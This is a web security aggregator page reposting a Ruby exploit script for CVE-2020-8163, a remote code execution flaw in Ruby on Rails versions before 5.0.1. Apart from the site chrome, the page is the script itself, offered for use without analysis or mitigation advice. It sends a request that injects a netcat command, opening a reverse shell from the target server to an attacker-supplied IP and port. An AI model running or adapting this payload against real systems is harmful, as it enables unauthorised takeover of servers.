HackDig : Dig high-quality web security articles

Ruby On Rails 5.0.1 Remote Code Execution

2020-07-30 15:02
# Exploit Title: Rails 5.0.1 - Remote Code Execution# Date: 2020-07-19# Exploit Author: Lucas Amorim# Vendor Homepage: www.rubyonrails.org# Software Link: www.rubyonrails.org# Version: Rails < 5.0.1# Tested on: Linux/OSx# CVE : CVE-2020-8163# More information: https://github.com/sh286/CVE-2020-8163#!/usr/bin/rubyrequire 'net/http'def header  puts "[*] - CVE-2020-8163 - Remote code execution of user-provided local names in Rails < 5.0.1n"   puts "[*] - Author: Lucas Amorim lucas@lucasamorim.ca"  puts "[*] - Usage: n"  puts "ruby exploit.rb <url> <ip> <port>"endif ARGV.length < 3  header  exit(-1)endurl  = ARGV[0]ip   = ARGV[1]port = ARGV[2]puts "[*] Sending payload to #{url}"uri = URI(url+"?system(%27nc+-e+/bin/sh+#{ip}+#{port}%27)%3ba%23")Net::HTTP.get(uri)


Source: 0510700202-BLW/eussi/moc.ytirucesxc

Read:265684 | Comments:0 | Tags:No Tag

“Ruby On Rails 5.0.1 Remote Code Execution”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Announce

Share high-quality web security related articles with you:)
Tell me why you support me <3

Tag Cloud